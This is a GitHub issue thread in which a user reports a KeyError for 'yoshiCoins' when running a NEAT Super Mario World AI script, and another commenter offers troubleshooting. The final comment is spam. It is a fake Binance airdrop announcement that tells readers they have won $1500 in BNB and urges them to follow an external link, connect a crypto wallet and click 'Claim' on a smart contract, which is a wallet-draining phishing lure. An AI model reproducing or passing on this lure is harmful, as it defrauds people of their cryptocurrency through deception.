### ISSUE TITLE
Error while attempting to run SuperMarioWorldAI-NEAT.py

### ISSUE THREAD

**Issue by Foxy6670** [szmyty/OpenAI-Retro-SuperMarioWorld-SNES#3]
(Note I am using the included config-feedforward file that was in the GitHub repo with SuperMarioWorldAI-NEAT.py!) 
Whenever I try to run the file using Python in the Gym Retro environment, I get the following output, followed by the emulation window opening and then closing:

```
(deh_neet_projects) C:\Users\snorb\Desktop\deh_neet_projects\MarioWorld>python SuperMarioWorldAI-NEAT.py

 ****** Running generation 0 ******

Traceback (most recent call last):
  File "SuperMarioWorldAI-NEAT.py", line 171, in <module>
    winner = p.run(eval_genomes)
  File "C:\Users\snorb\Desktop\deh_neet_projects\lib\site-packages\neat\population.py", line 89, in run
    fitness_function(list(iteritems(self.population)), self.config)
  File "SuperMarioWorldAI-NEAT.py", line 64, in eval_genomes
    yoshiCoins = info['yoshiCoins']
KeyError: 'yoshiCoins'
```
Is there any way to fix this issue? Thank you in advance.

**Comment by unsightedmetal6** [comment]
Is the `config-feedforward` file in the same directory as the Python script?

Edit: I think the issue is actually that your script is not finding the data.json file.

**Comment by prezo-ci-bkp** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @
